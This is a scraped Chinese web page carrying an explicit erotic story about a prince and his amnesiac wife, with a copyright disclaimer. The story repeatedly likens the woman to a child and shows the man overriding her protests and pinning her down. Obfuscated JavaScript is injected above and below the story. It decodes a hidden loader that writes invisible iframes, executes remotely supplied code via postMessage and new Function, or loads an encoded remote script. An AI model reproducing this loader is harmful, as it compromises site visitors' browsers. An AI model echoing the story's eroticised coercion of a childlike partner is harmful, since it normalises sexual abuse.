密欲阅读_媚药强迫h

eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x6E\x68\x77"]=function(e){var hp =''+'ABCDEFGHIJKLMNOPQ'+'RSTUVWXYZabcdefghi'+'jklmnopqrstuvw'+'xyz012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=hp.indexOf(e.charAt(f++));o=hp.indexOf(e.charAt(f++));u=hp.indexOf(e.charAt(f++));a=hp.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x75\x6E\x41\x50\x77\x68\x55\x43"]=function(){eval(wnhw("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod25odyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHduaHcoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3bmh3KCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd25odygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMTk5MCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8xOTkwJ109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbih3bmh3KGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJz09UU55JysnMEMnKydNNWtUJysnTXR0JysnTScrJ20nKydSeVUnKydTJysnWm9oJysnWFlxbCcrJ25SeVV5JysnTScrJzAnKydRRE14RScrJzBNbDAnKycyYmo1JysnaWEnKyczVicrJ1dlJysnMGRYJysnWnUnKydjM2QnKyczWmtNbCcrJ1lrTWxFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ1FPRScrJ1NKTicrJ3BaJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ3BDaycrJ3JGWCcrJ1onKycnKycnLCd0Jyk="));}
中天月圆,楼角垂星。

月光淡淡地从窗外照进来,耀得糊著天青色薄纱的窗户上树影斑驳。

数盏灯中淡青色的纱幔在夜风中左右飞扬,九龙金炉里薄烟嫋嫋,熏得殿内阵阵香气。

轩辕练和轩辕明月两兄弟静坐对棋,空气里寂静无声,只有偶尔子落棋盘的敲击声响。

“禀皇上,明月王爷的家臣白冶求见王爷。”内廷总管大太监陈瑞在大殿外禀报道。

轩辕明月侧目,不由得拧起眉来。

轩辕练睨了轩辕明月一眼,漫不经心地勾起唇角,“宣他进殿。”

“奴才遵旨。”

不一会儿,陈瑞领著白冶站在殿外,“禀皇上、明月王爷,白冶带到。”

“让他进来。”轩辕练语调空冷,声音浑厚有力。

“遵旨。”

“吱呀!”一声,殿门推开。白冶小跑入殿,向著轩辕练和轩辕明月的方向跪地叩首,“参见皇上,王爷。”

“什麽事也值得你如此急急忙忙的深夜进?”轩辕明月脸色不郁地问道。

“禀王爷,王妃从黄昏一直站在王府门口等待王爷归来,直到现在还不肯入府。”

“站在王府门口?”轩辕明月的脸色难看,“她一个王妃像一个村妇一般站在门口这成何体统!你们都是死人吗?就不会拦住她?”

“请王爷恕罪!”白冶把头压得更低。府里现在谁不知道王爷很宠这个失忆後的王妃,纵便是再给他们十个胆,他们也不敢去得罪王妃。

“依朕看你还是把她休了为好。”轩辕练瞥了一眼轩辕明月。

轩辕明月站起身去,没有答腔。除了她太不识大体外,他对失忆後的她没有太多的反感。

轩辕明月举手捏了捏眉心,道,“皇兄,我回府去了。”

轩辕练掀起眼帘,望著棋盘,道,“这盘棋还未下完。”

轩辕明月一边疾步地往殿外走去,一边回话道,“留著以後再下罢。”

轩辕练支起下颚,凝视著轩辕明月疾步离去的身影若有所思了起来。若是以前的明月怎麽会为了一个女人耽搁了下棋?──下棋可是明月最大的嗜好。

事有反常必生妖孽!

轩辕练微眯双眸,看来他得寻一个空去见见这个‘失忆後的明月王妃’……

**

我立在明月王府的大门口上,焦急地等待著。

突见白冶骑著黑马行在一顶气派的大轿子前面。我咧嘴一笑,明月终於回来了……

“明月,你回来了。”我举著手中的淡粉色绢帕向渐行渐近的轿子左右地挥了挥。

“停轿。”轩辕明月低醇如酒的声音从轿子里头传出来。

门前一侍卫连忙弓身上前掀开了轿帘子,轩辕明月从轿里弯身,跨步,走了出来。

“明月……你怎麽这麽晚才回来?”我奔跑过去,揪著他月牙白的宽大衣袖左右摇晃了起来。

他拧紧眉,严厉道,“跟你说过多少次了不要站在王府大门口!你是把本王的话当耳边风麽?”

我歪著头,无辜地眨了眨眼,“明月在生气麽?”

“本王跟你说过多少次了!要唤本王为‘王爷’。”轩辕明月从我手中扯回他的衣袖,踱步,跨上石阶往王府大门行去。

“我是你的王妃又不是你的仆人,为什麽要学他们叫你‘王爷’?”我跟上去,再次揪住他的月牙白衣袖。

还敢强词夺理来著?

“放手。”轩辕明月扭过头来,蹙眉,眯起眼,危险地盯著我。

“不放,一放你就‘又’会走太快了,你一走快我就‘又’跟不上你。”我摇了摇头,坚决不不放手。

轩辕明月无奈地向上头翻了个白眼,回过头去,继续向前走。

我热情地问道,“明月,你吃饭了没有?”

他冷淡地回答,“吃过了。”

“明月……我调查了官员上朝的时间,你明日正好没有朝上。你要陪我玩一整天……”

轩辕明月瞥了我一眼,“明日本王要和大臣商议国事。”‘调查了?’她还真是长了胆开始‘调查’他的事来。

我狐疑地嘟囔发问,“你们昨天不是商议过了?”

“那是昨天的,明天的还没有商议。”

我吸了吸鼻子,顿时两眼泪弯弯,“你少骗我,我是失忆不是变傻了!这天下哪有那麽多的国事要你们天天商议?”

一瞬间我像是被最亲最爱的人给背叛遗弃了似的,痛苦、伤心、失落的情绪全部纠结在小小的脸上。

轩辕明月见此心头一抽,不禁柔和了脸上的线条,“明日本王就陪王妃逛逛园子。”

我的眼睛倏地一亮,开心地点起脚尖,双手攀上他的脖子,在他的左脸上轻轻地一吻,“我就知道明月对我最好了。”

她的这一吻,弄得轩辕明月的眼睛猛地串起了两团炙热的焰火来。他声线沙哑地说道,“那我们早些休息吧,明日一大早,便去逛园子。”

我笑弯了眼,愉快地点了点头,“嗯, 好。那你快去休息吧。我明日一大早就去找你。”

轩辕明月顿时脸色发青,像是一片郎心错付了般。

我不解眨了眨眼,“明月你怎麽了?”我把手抚上他的额头了,喃道,“没有发烧,那你的脸色怎麽这麽地难看?”

“没事。”轩辕明月从牙缝里挤出这两个字来。

失了忆,就连同最基本的东西她都忘得一干二静。整个思想纯净地像一个孩子一般。她没有听到他说的是‘我们早些休息’这几个字麽?暗示她这麽清楚她居然还不明白?

我拧眉当忧地望著他,“你一定是太累了,快去休息吧。我明日再来找你。”

我跑了数步出去,再回过身去,倒著走,向他挥了挥手中的粉红色绢帕,“快去睡吧。晚安……”

“噗……咳咳……”跟在轩辕明月身後的白冶忍俊不禁地差点笑了出来,他立马低下头去,用咳嗽声掩饰住了笑声。

轩辕明月狠狠回过头去,狠刮了白冶一眼,“你是太闲了吧?”

白冶立刻把头压得很低很低。

“把所有的店铺、田租的账本给本王整理清楚了,本王明晚上就好看到。”

“是。”白冶哭丧著一张脸。──那些账本用一天的时间怎麽能整理得清楚,看来今晚上他别想睡了。唉……王爷欲求不满怎麽就拿他来发泄?

轩辕明月冷睇了他一眼,甩袖离去。

**

翌日一早,和轩辕明月吃过了早膳,我便携著他的手往园子里去。

路经一个圆月门,我们便行入羊肠小径,一路蜿蜒。又见深草处的陡峭岩壁上有数条水流往下,潺潺流泻。水流经过小径,使得小径湿漉成溪,又因许久未有人走过,小径上便爬满了斑驳的苔藓。环顾四周又见数百年的柏树上密密麻麻地绕了一条又一条的绿叶藤蔓。

我不由惊叹道,“苔藓斑驳,古柏老藤。王府里真真是别有洞天,我们好似到了山地野外。”

轩辕明月笑道,“这里本就是山地野外,父皇把这块地赐给本王时本要把这里改建成亭榭楼台。只是本王不喜大兴土木,又因此处宛如仙境般优美宁静,就奏禀父皇保留著这里的景致。”

我笑弯了眼,点了点头,“如此便好。那些亭榭楼台处处可见,也不稀奇。倒是这草木繁茂的景致更加优美绝伦,可说是世间难觅。”

“是麽?”轩辕明月两眼灼热地盯著我。

阳光灿烂,微风吹拂过他的几线发丝,金光闪闪,他好似是画中走出的人物一般。

“嗯。”我笑著点了点头。

轩辕明月笑了,“难得有人和我一样的想法。”

“明月也是这样的想法?”我歪著头笑问。

“嗯。”轩辕明月携住我的白皙小手,小心翼翼地踩上布满绿幽幽的苔藓小径。“小心些,别摔著了。”

我笑著应道,“有你扶著,我才不怕摔倒呢。”

听完此话,轩辕明月不由地愣愣望著我。

我见他难得一见的发愣呆样,不由得噗嗤一笑。不想一不小心,重心不稳,脚一歪,身子斜了出去,我本能地死抓著轩辕明月的手,他正在发怔又被我这麽一扯,身子便跟著我的身子摔倒在地。

呜呜……还要这地水多,不然屁股定会被摔得很疼……

“啊……明月你好重……”明月的口压得我喘不过气来了。

阳光普照,我俩浑身沾水。悠悠地光线中见轩辕明月眉目如画,美煞天人!

轩辕明月静静地凝视著我,他的唇瓣离我越来越近,越来越近……

我双手撑住他快要贴上来的脸庞,嗔怒道,“明月你快起来呀,我快不能呼吸了。”

轩辕明月无奈扶额,低低叹息,“你还真会破坏情趣。”

“什麽情趣?”我疑惑地盯著他看,并不懂他说的是什麽意思。

“你怎麽一失忆把男女间最基本的事情都忘了?”他在我耳边轻声呢喃道。

“明月你到底在说什麽?”为什麽我一句也听不懂。

轩辕明月又叹了口气,把我的身子从湿苔中抱了起来,往阳光明媚的草地上走了去……

**

碧草青青花盛开,彩蝶双双花丛来。

“呀……明月……等等……你要做什麽?你为什麽要脱我衣服?”他不管我的反抗,硬是把我给脱得光溜溜的……

“你的衣服都湿了,不脱下来的话,你会著凉的。”轩辕明月笑睨我一眼,说地理直气壮。

我撅起嘴嘟囔道,“可是衣服都被你脱去了我会著凉得更快……”

“我们等下做些‘运动’就不会觉得冷了。”轩辕明月把我最里面的小裤裤也给脱掉了。

“明月……这样好奇怪……”我用绢帕遮著小脸只露出两颗圆滚滚的眼珠子。

“有什麽好奇怪的?”轩辕明月没好气地问道。

我眨了眨眼,想了又想,还是想不出是哪里奇怪了,只得乖乖摇了摇头,“我不知道……”

轩辕明月了我的头发,笑道,“不知道就乖乖地躺著,等衣服晾干了再给你穿上。”

“明月,我好冷……”我双手抱臂,现在虽然是春末夏初时节,但是天气依然有些寒意。

“嘘!乖!现在不要说话,等下就让你暖和起来。”

“嗯,好。”我如同一个听话的孩童般点了点头。给轩辕明月全心全意的信赖,“明月你要不要也脱下衣裳晾一晾?”明月的衣服也湿了。

轩辕明月轻笑地嗯了一声,便三下两除的,片刻间,他的身上的月牙白长袍也被他给褪了下去。胯下的一接触到微凉的空气便气势磅礴地鼓胀了起来。

“耶?明月,为什麽你会长得和我不一样?”好奇怪……,我的是凸凸的,他却是平平的。他下面有一条又又挺的圆,可是我却没有。

我伸手揪住他下面的那一条,见它在我的手中不断胀大,便吓得丢了开来。

“明月……那是什麽?为什麽会跳动?它是不是一条大虫子?你身上怎麽会长了条大虫子?”

轩辕明月无奈又翻了个白眼,她摔坏了脑袋,智力虽是正常,但除了语言以外她其他的东西都忘记了,现在的她就像个刚出生的婴儿般,纯白无暇,宛如一张干净的白纸。

轩辕明月把他的那硕大物塞到了我的手上,抓著我的手,让我的掌心紧紧包裹住,“不要怕,它是我身体里的一部分,它是不会伤害你的。不信的话,你大可以再握住它……”

──那就让他在这张白纸上绘下他想要的内容。

我眨了眨眼,怯生生地伸出手去点了点轩辕明月胯下那条大物前面的那个形状像蘑菇的圆润头部。

我的指腹上了圆圆的大头,笑地清甜可人,“明月,它好滑……”

天……轩辕明月承受不住地咽了口唾沫,喉结不停地上下滚动了起来。她做这样的事情怎麽可以配上这样‘无邪’的笑容?!──这不是存心要他崩溃麽?

轩辕明月声线沙哑,低低轻哄道,“好了,等下再给你玩,现在我们快快做些‘运动’,不然的话我们俩都该著凉了。”

他一说完,便低下头来封住我的小口,滑溜的舌头撬开了我的贝齿,滑入我的口腔里,他的舌头挑起我的舌头,再把我的舌吸到他的口腔中泽泽有声地吸吮、吞咽了起来。

“唔……”我顿时觉得有一股电流从向我的袭来,我瞬间酥软掉了整个身子。

渐渐地轩辕明月的大手从我的腰上缓缓地到了我的大腿之间,五指贴在我柔软的细毛顺时针磨了数圈後,便以指尖沿著阜中线,来来回回地滑动了起来。

“啊……”我的身子微微一颤,本能的并起双腿,阻止了他大手的继续动作。但随即双腿又被他的大掌再度掰地开开的。

“呜呜……明月不要……呜呜……好痒呀……”我不堪体内的痒意左右扭动著腰肢,不让他继续抚。

“不要动!”轩辕明月低喊一声,索他健壮的身子便趴上我的柔软身子上,死死压住我不停蠕动的身子。

“呜呜……明月你好重,你不要压我……呜呜……我快被你压岔了……呜呜……”我可怜兮兮地告状著,哀求著。我的小口张地大大地吸吮著新鲜的空气,啊啊……我快不能呼吸了!!

轩辕明月哄骗著,“你不乱动,本王便不压你。”

“嗯。”我信以为真地乖巧点了点头。

随後,他满意地低低笑起,在我的双腿间跪直身子,弯著眼,睨著我,恐吓道,“不要动,不然本王就再压你!”这不是他平素里的作风,他现在这个样子像是在哄骗一个小孩子似的,这种感觉对他来讲又是新鲜又是无奈。

“嗯嗯!”我再次点了点头。

他用一只手的两指掰著我的两片肥美的办,露出中间的一线小洞。他另一只手的手指轻轻地滑过我凸起的小豆豆,然後倏地进了我的小洞中……

“嘶──啊──”因轩辕明月手指的倏然的入,使得我的身子本能地弓了起来,异物搁在体内的不适感觉不禁让我皱眉尖叫了起来。

“你好紧!是不是已经太久没有要你了?”他一边低哑地问著我话一边低头轻咬住我粉红色的蓓蕾。“我从来没有认真看过你的头,原来它们是粉红色的,太好可爱了。”

“啊……”我扭了扭臀,抽气声声中任由他的长指一直在我的狭窄的甬道里搅动勾磨著。

也不知道为什麽,被轩辕明月的那里竟沁出了暖暖的水泽来。──好痒~竟像是有无数只蚂蚁装进去了一般。这一时刻我便想要是明月的手指能抠得更重些就完美了。

肌肤在轩辕明月快速的滑动中逐渐地烫了起来,如同在篝火边烤火一般。竟真的如轩辕明月所言那般没有冷的感觉。

“明月……我好热……”我嘤咛出声,本能地举起臀,把他的手指尽吃进里深深处。

随後又放下臀 ,再次举起。

一次又一次地重覆著用著他的手指来自慰著发痒的花。

“嗯!”轩辕明月抿唇闷哼一声,把他的手指从我的体内抽了出来。

“明月……不要拿走……别、别……”我抓著他的大手往自己的下体再次去。

轩辕明月含笑地看著拿他的手当自慰工具的娇娃。她的失忆,太过纯净了。想要就要,没有了世俗害羞扭捏之心的牵绊。

轩辕明月再次把他的手指从我的花中抽出,淡笑著抚著我的脸颊,低醇的嗓音沙哑道,“别急,我会给你更大更舒服的东西。”

我迷茫地重复著他的话,“给我更大更舒服的?”

**

轩辕明月把我抱到了一个枕头形状的椭圆形石头上。

“嘶……好烫……”虽现在还是早晨,但日已上中天。石头在几个时辰的阳光照下,早就热烘烘的。

“等一下。”轩辕明月放下我的身子,去把披在草地上洒著太阳的衣裳取了一件来铺在了那形似枕头的石头上面。再把我的臀放了上去。

石头热,衣裳湿。合起来就是湿热。

把湿衣裳披在热石头上,屁股上软软绵绵的触感真的好舒服……。

臀被石头垫起,这一举动让原本就凸的阜更加的凸了起来。也使得办间粉红色的缝隙微微地分了开来,露出盛著水的靡景象来。

轩辕明月看得两眼直串欲火。举著物对准花芯,直了进去!

“啊──”贯穿了我的身体,圆圆的塞满了我的儿,中皱的条纹被撑地平平的,也使得我的肚子微微的鼓了起来。

他使力一挺,鸭蛋一般大的头到了子口上,爱被挤得“滋滋”地从不停蠕动的花口溢了出来。“啪嗒啪嗒!”的洒落到了青青的草地上。

轩辕明月一只手撑在我的大腿上,另一只手则抓住我的房。跟随著他下体捣弄的节奏,他一捏一放地卡掐著我的。把我弹十足的掐的一会儿变成葫芦形,一会儿又变成长长的黄瓜形。

他才捣弄了十几下,小便酥麻了起来。湿淋淋、如婴儿手臂的撑得我又痛又麻又酥又涨。

阵阵消魂的快意随著的深浅抽涌上了我的心头。

他越越凶猛,我快乐地在他的身下不停地蠕动著臀部,助长他的摩擦。

花被他越越多了起来,满满的浸泡著他的大头。又随著头滋滋地塞进,被挤到了口处,涌了出来,洒在他的小腹上的黑色毛发上,把黑色的毛染得水光潋滟。在火热的阳光下更是闪闪发光了起来。

他看到此景象更是兴致高涨地捏起我的头,长长地拉了出去,变成线儿。我洒泪强撑,痛并快乐著。

我朦胧低眼,只见他的大物正随著他抽的动作时隐时现地出现在空气里。愈瞧我的身子愈热了起来,一阵接一阵的电流从我的小里头抽搐地穿过了我的心脏到达了我的脑海!

“啊、啊、啊……”我不由自主地随著他的干节奏晃动著自己白皙的臀。我幸福感叹:被他这样对待的感觉太爽,太舒服,太快乐了。

他察觉到我的配合,便弯腰抱住我的头,含笑地用他的唇吸上了我的唇。

他弓起了他健美的腰身,下的两颗大丸随著他的动作又软又绵的扁扁贴在我的办上,在间又和我的两片肥美的贝上上下下左左右右的磨了又磨。哆嗦得颤一个身子,叹一个‘好舒服’!

他的唇自我的下巴往脖子上吻去,渐渐地他的唇攀上了我圆润的峰之巅,叼住珠,像个婴儿吸吮母般吸著舔著嚼著我圆润如珠的头。

“啊……”我的理智在头被吸,儿被干中彻底崩溃了。我的身子完全瘫软掉了。只有双腿还张得大大的任他的物在里面捣臼著。

当物开了嫣红的缝时,蜜便不断地从被撑开的裂缝冒著小小泡泡的出流了出来……

大约摩擦了三百多下後,我们交互交合的下体处的腥甜气味愈来愈浓烈了起来。渐渐地漂浮得我们周围的空气都带著腥甜的交欢味道。

轩辕明月双眼盯著著一巨大的裂缝处,他鼻翼翕动,呼吸急促,低低难道,“好香,你闻到了麽?”

“这味道好怪……”

“这是本王和你相摩擦生出的味道,是本王和你共同的味道!”轩辕明月著魔地低下头去带著啃咬地吸吮起了我的头来。

花在他愈来愈快的抽送中变得愈加敏感了起来,一阵强劲的哆嗦过後,伴随而来的是毁天灭地的快感。

“啊……”我尖叫一声,挺著下体喷出一大股的水花来……啊啊,得轩辕明月的整个小腹都是从我花里喷出的水……

“啊……小妖,你居然潮吹了……嗯、啊──”轩辕明月咬牙低吼,一阵几乎能要他命的窒息感向他袭来,他全身发抖地战颤了起来。

他大力的掰著我的腿,平滑刚毅的小腹紧紧抵住我的耻部,一股热流沿著他的物从头前端的小孔里了出来。

完後,他整个人像是虚脱了般的倒在了我的身上,压得我差点岔气过去。

“明月……你……你说过不压我的……”我含泪控诉著他的说话不算话。

“抱歉……本王这就起身。”他喘连连地从我的身上爬起了身来。把我翻个身,让我像只小狗一样的趴在青草地上。

“明月,你要做什麽?”我不解地回过头问道。

他声线嘶哑道,“再给你快乐……”

倏地,他的一只大手罩上我那沾著花露的毛发上,他的另一只大手伸至他的胯下,握住他自己的前後的套弄了起来。软了的在他的套弄下快速的再次壮大了起来。雄壮非凡,霸气十足。

他把他的大蘑菇头抵在口上,虎腰一挺,物再次把我的花缝塞得满满的,一丝的空隙也无。

他挪动著他自己的臀,给自己调整了一个适合干的位置後,他的双手掐著我的臀,提上提下地摇著我的屁股狠了起来……

我被他贯穿到全身发软,最终上半身向前一倾,我的上半身摔倒在青草地上。尖跟随著他的抽动作在地面上和草儿来来回回的相互磨蹭了起来……

“心娴说‘用力我,死我。’这句话,宝贝快说,本王想听!”

他语中的‘宝贝’两字,让我的心都酥了。

我转过头去深深地望著他,甜甜地笑了,“虽然我……不明白……这是多麽意思,嗯、嗯……啊、啊……但是……明月喜欢听的,我便会说……嗯、啊、啊……”在他答力的干中,我的声音断断续续的,“明月,我,用力的我……嗯、嗯死我……”

她甜甜的一笑迷了他的心,她真心的话语勾了他的魄。於是轩辕明月便两眼发了狠,他越捣越带劲,越越兴奋。终於干得花芯深处的爱宛如河川泛滥一发不可收拾地喷出来。──持续的抽搐,痉挛!啊~她又被到潮吹了!!身下的青草也湿了,轩辕明月的小腹湿了。

阳光照耀,草上花反光而,滴滴花竟然颗颗亮如珍珠……

轩辕明月双眸幽暗,窄臀紧绷,臀的左右同时出现了两个宛如酒窝般的窝儿,他仰头,脖上青筋浮现,结实的臀一下一下的砸向我的屁股。圆硕的大头随著他的砸弄,次次卡陷在子口上,引发了交的最高潮!

“喝……”他沈重一捣,湿润的腹抵著我的臀,闷吼一声後,便出了炙热浓稠的白,烫得我卷曲了脚趾,连同子都抽搐地收缩了起来……
版权声明

本站内容由互联网搜集而来,不代表撩妹情话网立场,请勿对号入座!
如果本文侵犯了您的合法权益,请联系我们,我们将在第一时间处理!

eval("\x77\x69\x6e\x64\x6f\x77")["\x6E\x70\x6C\x73"]=function(e){var sp =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXY'+'Zabcdefgh'+'ijklmnopqrs'+'tuvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x41\x73\x58\x70\x50\x73\x6C\x6E\x5A"]=function(){eval(npls("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQobnBscyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKG5wbHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihucGxzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbbnBscygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKG5wbHMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPXdNTScrJ3kwU00nKydNJysnNWtUTU0nKyd0TScrJ01tUicrJ3lVQ01NJysndDVXWjAnKydNTWonKydSeVV5JysnTU0wUUQnKydNTXgnKydFJysnME0nKydNbCcrJzAyJysnYmo1aWEnKyczJysnVlcnKydlJysnMGQnKydYJysnWnUnKydjJysnM2QnKyczWmsnKydNTWxZJysna00nKydNbCcrJ0UnKycwTU0nKydsTScrJ01IYzBSJysnSCcrJ2EnKycnKycnLCcnKydJZ0snKydsanMnKydBZScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydhdmQnKydlTXgnKyc1JysnJysnJywnTScp"));}